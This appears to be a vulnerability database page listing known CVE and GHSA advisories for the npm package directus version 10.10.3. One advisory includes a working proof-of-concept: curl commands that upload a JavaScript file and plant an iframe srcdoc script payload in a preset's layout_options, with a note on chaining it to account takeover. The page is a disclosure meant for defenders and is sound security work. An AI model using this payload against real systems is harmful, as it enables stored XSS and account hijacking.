Search for packages
| purl | pkg:npm/directus@10.10.3 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-4wtt-tffj-bbeb
Aliases: CVE-2025-30225 GHSA-j8xj-7jff-46mx |
Affected by 11 other vulnerabilities. |
|
|
VCID-5u8r-s8tz-guhm
Aliases: CVE-2025-55746 GHSA-mv33-9f6j-pfmc |
Affected by 6 other vulnerabilities. |
|
|
VCID-7fzh-j76t-5kd3
Aliases: CVE-2025-30351 GHSA-56p6-qw3c-fq2g |
Affected by 11 other vulnerabilities. |
|
|
VCID-7mea-hn69-wuhu
Aliases: CVE-2025-30353 GHSA-fm3h-p9wm-h74h |
Affected by 11 other vulnerabilities. |
|
|
VCID-7zt3-dcnm-hqfb
Aliases: CVE-2025-64746 GHSA-9x5g-62gj-wqf2 |
Directus has Improper Permission Handling on Deleted Fields Directus does not properly clean up field-level permissions when a field is deleted. If a new field with the same name is created later, the system automatically re-applies the old permissions, which can lead to unauthorized access. |
Affected by 2 other vulnerabilities. |
|
VCID-8uym-xka8-cybb
Aliases: CVE-2024-34709 GHSA-g65h-35f3-x2w3 |
Affected by 25 other vulnerabilities. |
|
|
VCID-anfb-6kfn-a7h7
Aliases: CVE-2026-26185 GHSA-jr94-gj3h-c8rf |
Directus Vulnerable to User Enumeration via Password Reset Timing Attack A timing-based user enumeration vulnerability exists in the password reset functionality. When an invalid reset_url parameter is provided, the response time differs by approximately 500ms between existing and non-existing users, enabling reliable user enumeration. |
Affected by 0 other vulnerabilities. |
|
VCID-bh2g-b9dd-d3d9
Aliases: CVE-2025-53886 GHSA-f24x-rm6g-3w5v |
Affected by 7 other vulnerabilities. |
|
|
VCID-eb8p-vqjt-yfb8
Aliases: CVE-2024-34708 GHSA-p8v3-m643-4xqx |
Affected by 25 other vulnerabilities. |
|
|
VCID-g34r-4mb9-afab
Aliases: CVE-2025-30352 GHSA-7wq3-jr35-275c |
Affected by 11 other vulnerabilities. |
|
|
VCID-hed8-anm5-ukc9
Aliases: CVE-2026-22032 GHSA-3573-4c68-g8cc |
Directus has open redirect in SAML An open redirect vulnerability exists in the Directus SAML authentication callback endpoint. The `RelayState` parameter is used in redirects without proper validation against an allowlist of permitted domains. |
Affected by 1 other vulnerability. |
|
VCID-hhwc-1jxe-7yaw
Aliases: CVE-2025-30350 GHSA-rv78-qqrq-73m5 |
Affected by 11 other vulnerabilities. |
|
|
VCID-hpbn-rr29-2yck
Aliases: CVE-2025-53885 GHSA-x3vm-88hf-gpxp |
Affected by 7 other vulnerabilities. |
|
|
VCID-jjth-fmsp-rfcj
Aliases: CVE-2025-64747 GHSA-vv2v-pw69-8crf |
Directus is Vulnerable to Stored Cross-site Scripting A stored cross-site scripting (XSS) vulnerability exists that allows users with `upload files` and `edit item` permissions to inject malicious JavaScript through the Block Editor interface. Attackers can bypass Content Security Policy (CSP) restrictions by combining file uploads with iframe srcdoc attributes, resulting in persistent XSS execution. |
Affected by 2 other vulnerabilities. |
|
VCID-kqs7-8txh-jyc8
Aliases: CVE-2024-6534 GHSA-3fff-gqw3-vj86 |
Affected by 21 other vulnerabilities. |
|
|
VCID-m3wb-sstx-v3d6
Aliases: CVE-2025-24353 GHSA-pmf4-v838-29hg |
Affected by 19 other vulnerabilities. |
|
|
VCID-m5ng-dsfx-6qev
Aliases: CVE-2024-54128 GHSA-r6wx-627v-gh2f |
Affected by 18 other vulnerabilities. Affected by 18 other vulnerabilities. |
|
|
VCID-msb5-197k-a3er
Aliases: CVE-2024-46990 GHSA-68g8-c275-xf2m |
Affected by 0 other vulnerabilities. Affected by 20 other vulnerabilities. Affected by 21 other vulnerabilities. |
|
|
VCID-na3v-me78-aqcg
Aliases: CVE-2025-64749 GHSA-cph6-524f-3hgr |
Directus Vulnerable to Information Leakage in Existing Collections An observable difference in error messaging was found in the Directus REST API. The `/items/{collection}` API returns different error messages for these two cases: 1. A user tries to access an existing collection which they are not authorized to access. 2. A user tries to access a non-existing collection. The two differing error messages leak the existence of collections to users which are not authorized to access these collections. |
Affected by 2 other vulnerabilities. |
|
VCID-nvha-b5tb-dqdt
Aliases: CVE-2025-64748 GHSA-8jpw-gpr4-8cmh |
Directus's conceal fields are searchable if read permissions enabled A vulnerability allows authenticated users to search concealed/sensitive fields when they have read permissions. While actual values remain masked (`****`), successful matches can be detected through returned records, enabling enumeration attacks on sensitive data. |
Affected by 2 other vulnerabilities. |
|
VCID-pwt9-krmn-7kdd
Aliases: CVE-2025-53889 GHSA-7cvf-pxgp-42fc |
Affected by 7 other vulnerabilities. |
|
|
VCID-wgag-36wa-qyay
Aliases: GHSA-9qrm-48qf-r2rw |
Directus has a DOM-Based cross-site scripting (XSS) via layout_options ### Impact Directus allows an authenticated attacker to save cross site scripting code to the database. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with [CVE-2024-6534](https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86), it could result in account takeover. ### PoC To exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account. 1. Upload the following JavaScript file. Using the upload functionality at `POST /files`. This PoC will show an alert message. ```js export TARGET_HOST="http://localhost:8055" export ATTACKER_EMAIL="malicious@malicious.com" export ATTACKER_PASSWORD="123456" root_dir=$(dirname $0) mkdir "${root_dir}/static" curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \ -c "${root_dir}/static/attacker_directus_session_token" \ -H 'Content-Type: application/json' \ -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}" id_url_file=$(echo "alert('Successful DOM-based XSS')" | curl -s -k -X 'POST' "${TARGET_HOST}/files" \ -b "${root_dir}/static/attacker_directus_session_token" \ -F "file=@-;type=application/x-javascript;filename=poc.js" | jq -r ".data.id") ``` 2. Create a preset for a collection and store the preset ID. Or use a preset already created from GET /presets. The following example uses the direct_users preset. ``` attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \ -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id") curl -i -s -k -X 'POST' "${TARGET_HOST}/presets" \ -H 'Content-Type: application/json' \ -b "${root_dir}/static/attacker_directus_session_token" \ --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"<iframe srcdoc=\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\">\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}" ``` When the user visits the view that uses the directus_users preset, the JavaScript file will be executed. Notes: Need to use an iframe to execute the malicious JavaScript file to bypass the CSP policies. The payload structure is `<iframe srcdoc=\"<script src='URL_MALICIOUS_FILE'> </script>\">`. We can target any collection that uses the vulnerable template structure that renders the layout option section. In this PoC, the target is the same user who sends the payload, but if the attacking user has permission to modify or create presets for other users or even if he does not have permissions but can chain with CVE-2024-6534, he can achieve an account takeover. |
Affected by 16 other vulnerabilities. |
|
VCID-wn2j-dtpz-hye1
Aliases: CVE-2025-53887 GHSA-rmjh-cf9q-pv7q |
Affected by 7 other vulnerabilities. |
|
|
VCID-xc7t-gwaz-ckeu
Aliases: CVE-2024-39896 GHSA-jgf4-vwc3-r46v |
Affected by 24 other vulnerabilities. |
|
|
VCID-xt9c-32g5-mqes
Aliases: CVE-2024-45596 GHSA-cff8-x7jv-4fm8 |
Affected by 0 other vulnerabilities. Affected by 21 other vulnerabilities. |
|
|
VCID-yutw-33sk-5fg3
Aliases: GHSA-q83v-hq3j-4pq3 |
Duplicate Advisory: Improper access control in Directus |
Affected by 22 other vulnerabilities. |
|
VCID-yz34-qwam-wbcn
Aliases: CVE-2024-36128 GHSA-632p-p495-25m5 |
Affected by 24 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||